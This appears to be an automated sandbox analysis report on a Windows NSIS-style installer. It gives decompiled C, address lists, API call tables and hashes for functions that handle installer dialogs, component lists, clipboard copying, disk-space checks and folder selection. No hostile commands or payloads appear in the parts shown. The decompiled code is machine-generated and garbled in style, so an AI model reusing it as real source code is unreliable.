0x00404f8a
0x00404f90
0x00404fa1
0x00404fa6
0x00404fb4
0x00404fc2
0x00404fc2
0x00404fc7
0x00404fd5
0x00404fd5
0x00404fda
0x00404fdd
0x00404fe2
0x00404fee
0x00404ff7
0x00405004
0x00405013
0x00405006
0x0040500b
0x0040500b
0x00405004
0x00405028
0x00405031
0x0040503a
0x0040504a
0x00405056
0x00405056
0x00000000

APIs

GetDlgItem.USER32 ref: 00404F1B
GetDlgItem.USER32 ref: 00404F2A
GetDlgItem.USER32 ref: 00404F39

Part of subcall function 00403DF8: SendMessageA.USER32(00000028,?,00000001,00403C2B), ref: 00403E06

GetClientRect.USER32 ref: 00404F67
GetSystemMetrics.USER32 ref: 00404F6F
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F90
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404FA1
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB4
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FC2
SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD5
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FF7
ShowWindow.USER32(?,00000008), ref: 0040500B
GetDlgItem.USER32 ref: 00405021
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405031
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040504A
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405056
GetDlgItem.USER32 ref: 00405073
CreateThread.KERNEL32(00000000,00000000,Function_00004E50,00000000), ref: 00405081
CloseHandle.KERNEL32(00000000), ref: 00405088
ShowWindow.USER32(00000000), ref: 004050AC
ShowWindow.USER32(00000000,00000008), ref: 004050B1
ShowWindow.USER32(00000008), ref: 004050F7
SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405129
CreatePopupMenu.USER32 ref: 0040513A
AppendMenuA.USER32 ref: 0040514F
GetWindowRect.USER32 ref: 00405162
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,00000000,00000000), ref: 00405184
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051BF
OpenClipboard.USER32(00000000), ref: 004051CF
EmptyClipboard.USER32(?,?,00000000,00000000,00000000), ref: 004051D5
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,00000000,00000000), ref: 004051DE
GlobalLock.KERNEL32 ref: 004051E8
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051FC
lstrlenA.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 00405203
GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040521A
SetClipboardData.USER32(00000001,00000000), ref: 00405225
CloseClipboard.USER32(?,?,00000000,00000000,00000000), ref: 0040522B

Strings

{, xrefs: 00405116

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
String ID: {
API String ID: 1050754034-366298937
Opcode ID: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
Instruction ID: a9b8c0cf866c2a3c8f14101a7fbd3d30c206ebeedcb3c516614c272958fa201a
Opcode Fuzzy Hash: bb195872a3db692d4f828066a8d1e4032435f681960caf5b55af3d3660bbe9d3
Instruction Fuzzy Hash: 59A14B70900208BFDB11AF61DD89EAE7F79FB04354F50813AFA05BA1A0C7759A41DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004046C3, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 477
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E004046C3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42f448;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42f428 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42f431 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404643(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42f430) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42a884;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42a898;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42a884 = _t315;
								 *0x42a898 = _t315;
								 *0x42f480 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42f431 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42a898;
									_t196 =  *0x42f448;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42f44c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										_t198 =  *0x42ebfc; // 0x583a6d
										if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
											E00404561(0x3ff, 0xfffffffb, E00404616(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42f44c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42a898);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42f480 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a898 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_v24 = LoadBitmapA( *0x42f420, 0x6e);
					 *0x42a894 = SetWindowLongA(_v8, 0xfffffffc, E00404CBD);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a884 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a884);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FD(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DC3(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a898 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a898 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a898 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42f44c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DF8(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DF8(_v12);
								L89:
								return E00403E2A(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x004046e1
0x004046e7
0x004046e9
0x004046ef
0x004046f5
0x00404702
0x0040470b
0x0040470e
0x00404711
0x00404932
0x00404939
0x0040494d
0x0040493b
0x0040493d
0x00404940
0x00404941
0x00404948
0x00404948
0x00404959
0x00404967
0x0040496a
0x00404980
0x004049f8
0x004049fb
0x004049fd
0x00404a07
0x00404a15
0x00404a15
0x00404a17
0x00404a21
0x00404a27
0x00404a48
0x00404a29
0x00404a36
0x00404a36
0x00404a27
0x00404a21
0x00000000
0x004049fb
0x00404985
0x00404990
0x00404995
0x0040499c
0x004049a3
0x004049ad
0x004049ad
0x004049b1
0x004049b6
0x004049bb
0x004049d1
0x004049bd
0x004049bd
0x004049c5
0x004049cc
0x004049c7
0x004049c7
0x004049c7
0x004049c5
0x004049d5
0x004049d7
0x004049e5
0x004049e6
0x004049f2
0x004049f5
0x004049f5
0x004049b6
0x00000000
0x004049a3
0x00404987
0x0040498e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a4b
0x00404a4b
0x00404a52
0x00404ac6
0x00404acd
0x00404ad9
0x00404ad9
0x00404ae2
0x00404ae4
0x00404aeb
0x00404aee
0x00404aee
0x00404af4
0x00404afb
0x00404afe
0x00404afe
0x00404b04
0x00404b0a
0x00404b10
0x00404b10
0x00404b1d
0x00404c6a
0x00404c71
0x00404c8e
0x00404c94
0x00404ca6
0x00404ca6
0x00000000
0x00404b23
0x00404b25
0x00404b2d
0x00404b31
0x00404b31
0x00404b39
0x00404b7a
0x00404b7c
0x00404b8c
0x00404b8f
0x00404b94
0x00404b9b
0x00404b9e
0x00404c40
0x00404c46
0x00404c4c
0x00404c54
0x00404c65
0x00404c65
0x00000000
0x00404c54
0x00404ba4
0x00404ba7
0x00404bad
0x00404bb2
0x00404bb4
0x00404bb6
0x00404bbc
0x00404bc3
0x00404bc8
0x00404bcf
0x00404bd2
0x00404bd2
0x00404bd9
0x00404be5
0x00404be9
0x00404beb
0x00404beb
0x00404bdb
0x00404bdd
0x00404bdd
0x00404c0b
0x00404c17
0x00404c26
0x00404c26
0x00404c28
0x00404c2b
0x00404c34
0x00000000
0x00404b3b
0x00404b46
0x00404b49
0x00404b4e
0x00404b50
0x00404b54
0x00404b64
0x00404b6e
0x00404b70
0x00404b73
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b56
0x00404b56
0x00404b5c
0x00404b5e
0x00404b5e
0x00404b5f
0x00404b60
0x00000000
0x00404b56
0x00404b39
0x00404b1d
0x00404a5a
0x00000000
0x00404a70
0x00404a7a
0x00404a7f
0x00000000
0x00000000
0x00404a91
0x00404a96
0x00404aa2
0x00404aa2
0x00404aa4
0x00404ab3
0x00404ab5
0x00404abc
0x00404abf
0x00000000
0x00404abf
0x00404a5a
0x00404717
0x0040471c
0x00404726
0x00404727
0x00404730
0x0040473b
0x00404756
0x00404768
0x0040476d
0x00404778
0x00404781
0x00404796
0x004047a7
0x004047b4
0x004047b4
0x004047b9
0x004047bf
0x004047c1
0x004047c4
0x004047c9
0x004047ce
0x004047d0
0x004047d0
0x004047d3
0x004047d4
0x004047f0
0x004047f0
0x004047f2
0x004047f3
0x004047f8
0x004047fb
0x004047fe
0x00404802
0x00404807
0x0040480c
0x00404810
0x00404815
0x0040481a
0x0040481c
0x00404824
0x004048ee
0x00404901
0x00000000
0x0040482a
0x0040482d
0x00404830
0x00404833
0x00404833
0x00404839
0x0040483f
0x00404842
0x00404848
0x00404849
0x0040484e
0x00404857
0x0040485e
0x00404861
0x00404864
0x00404867
0x004048a3
0x004048cc
0x004048a5
0x004048b2
0x004048b2
0x00404869
0x0040486c
0x0040487b
0x00404885
0x0040488d
0x00404894
0x0040489c
0x0040489c
0x00404867
0x004048d2
0x004048d3
0x004048df
0x004048df
0x004048ec
0x00404907
0x0040490b
0x00404928
0x0040492d
0x00404930
0x00000000
0x0040490d
0x00404912
0x0040491b
0x00404ca8
0x00404cba
0x00404cba
0x0040490b
0x00000000
0x004048ec
0x00404824

APIs

GetDlgItem.USER32 ref: 004046DA
GetDlgItem.USER32 ref: 004046E7
GlobalAlloc.KERNEL32(00000040,?), ref: 00404733
LoadBitmapA.USER32 ref: 00404746
SetWindowLongA.USER32 ref: 00404759
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040476D
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404781
SendMessageA.USER32(?,00001109,00000002), ref: 00404796
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047A2
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047B4
DeleteObject.GDI32(?), ref: 004047B9
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047E4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047F0
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404885
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048B0
SendMessageA.USER32(?,00001100,00000000,?), ref: 004048C4
GetWindowLongA.USER32 ref: 004048F3
SetWindowLongA.USER32 ref: 00404901
ShowWindow.USER32(?,00000005), ref: 00404912
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A15
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A8F
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AB3
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AD9
ImageList_Destroy.COMCTL32(?), ref: 00404AEE
GlobalFree.KERNEL32 ref: 00404AFE
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B6E
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C17
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C26
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C46
ShowWindow.USER32(?,00000000), ref: 00404C94
GetDlgItem.USER32 ref: 00404C9F
ShowWindow.USER32(00000000), ref: 00404CA6

Strings

, xrefs: 00404C7E
N, xrefs: 00404950
m:X, xrefs: 00404C4C
M, xrefs: 0040486C

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$m:X
API String ID: 1638840714-1755326645
Opcode ID: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
Instruction ID: a703f14ce3faa2e4f8142ea310930ebcb38104dd784f52016b44af4a551de8a9
Opcode Fuzzy Hash: 492e76265ab7cc4ed03b52ac64fc1ec799b063a37a97735f7d713d4af27fae02
Instruction Fuzzy Hash: B602AFB0E00209AFDB21DF54CC45AAE7BB5FB84314F10817AF610BA2E1C7799A52CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00404201, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 242
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404201(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				intOrPtr _t136;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x42a078;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052BF(0x3fb, _t151);
					E00405C17(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052BF(0x3fb, _t151);
							if(E004055C8(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059DB(0x429870, _t151);
							_t80 = E0040557B(0x429870);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CEE("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x429870,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x429870);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E00404616(5)) {
									_v8 = 2;
								}
								_t136 =  *0x42ebfc; // 0x583a6d
								if( *((intOrPtr*)(_t136 + 0x10)) != 0) {
									E00404561(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x429860);
									} else {
										E00404561(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x42f4c4 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DE5(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a890 == 0) {
									E00404196();
								}
								 *0x42a890 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x42a8a0;
							_v76 = _a4;
							_v68 = 0x42a8a0;
							_v56 = E004044FB;
							_v52 = _t151;
							_v64 = E004059FD(0x3fb, 0x42a8a0, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x429c78, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E00405238(0, _t110);
								E004054E8(_t151);
								_t114 =  *((intOrPtr*)( *0x42f428 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059FD(0x3fb, 0x42a8a0, _t151);
									_t144 = 0x42e3c0;
									if(lstrcmpiA(0x42e3c0, 0x42a8a0) != 0) {
										lstrcatA(_t151, 0x42e3c0);
									}
								}
								 *0x42a890 =  *0x42a890 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405554(_t151) != 0 && E0040557B(_t151) == 0) {
						E004054E8(_t151);
					}
					 *0x42ebf8 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DC3(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DC3(_a4);
					E00403DF8(_t144);
					_t128 = E00405CEE("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E2A(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}

0x00404207
0x0040420e
0x0040421a
0x00404228
0x00404230
0x00404234
0x0040423a
0x0040423a
0x00404246
0x004042c0
0x004042c7
0x00404393
0x0040439a
0x004043a9
0x004043a9
0x004043ad
0x004043b3
0x004043b6
0x004043c3
0x004043c5
0x004043c5
0x004043d3
0x004043d9
0x004043e0
0x004043e2
0x004043e2
0x004043ef
0x004043fb
0x0040441f
0x00404430
0x00404436
0x00404438
0x00000000
0x00000000
0x0040443e
0x0040443e
0x0040444c
0x00000000
0x004043fd
0x00404400
0x00404404
0x00404408
0x00404409
0x0040440e
0x00000000
0x00000000
0x00404416
0x0040444e
0x0040444e
0x00404455
0x0040445e
0x00404460
0x00404460
0x00404467
0x00404472
0x0040447c
0x00404484
0x0040449a
0x00404486
0x0040448a
0x0040448a
0x00404484
0x0040449f
0x004044a4
0x004044a9
0x004044b2
0x004044b2
0x004044bb
0x004044bd
0x004044bd
0x004044c9
0x004044d1
0x004044db
0x004044db
0x004044e0
0x00000000
0x004044e0
0x004043fb
0x0040439c
0x004043a3
0x00000000
0x00000000
0x00000000
0x004043a3
0x004042cd
0x004042d3
0x004042ed
0x004042f2
0x004042fc
0x00404303
0x00404308
0x00404312
0x00404315
0x00404318
0x0040431f
0x00404327
0x0040432a
0x0040432e
0x00404335
0x0040433d
0x0040438c
0x0040433f
0x00404340
0x00404346
0x00404350
0x00404358
0x0040435a
0x0040435b
0x0040435d
0x00404363
0x00404371
0x00404375
0x00404375
0x00404371
0x0040437a
0x00404385
0x00404385
0x0040433d
0x00000000
0x004042f2
0x004042e0
0x00000000
0x00000000
0x004042e6
0x00000000
0x00404248
0x00404253
0x0040425c
0x00404269
0x00404269
0x00404273
0x00404278
0x00404281
0x00404284
0x00404289
0x00404291
0x00404294
0x00404299
0x0040429f
0x004042ae
0x004042b5
0x004044e6
0x004044f8
0x004044f8
0x004042be
0x00000000
0x004042be

APIs

GetDlgItem.USER32 ref: 0040424C
SetWindowTextA.USER32(00000000,?), ref: 00404278
SHBrowseForFolderA.SHELL32(?,00429C78,?), ref: 00404335
lstrcmpiA.KERNEL32(YVfgfgfgfgfg,0042A8A0,00000000,?,?,00000000), ref: 00404369
lstrcatA.KERNEL32(?,YVfgfgfgfgfg), ref: 00404375
SetDlgItemTextA.USER32 ref: 00404385

Part of subcall function 004052BF: GetDlgItemTextA.USER32 ref: 004052D2

Part of subcall function 00405C17: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C6F
Part of subcall function 00405C17: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C7C
Part of subcall function 00405C17: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040313E,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 00405C81
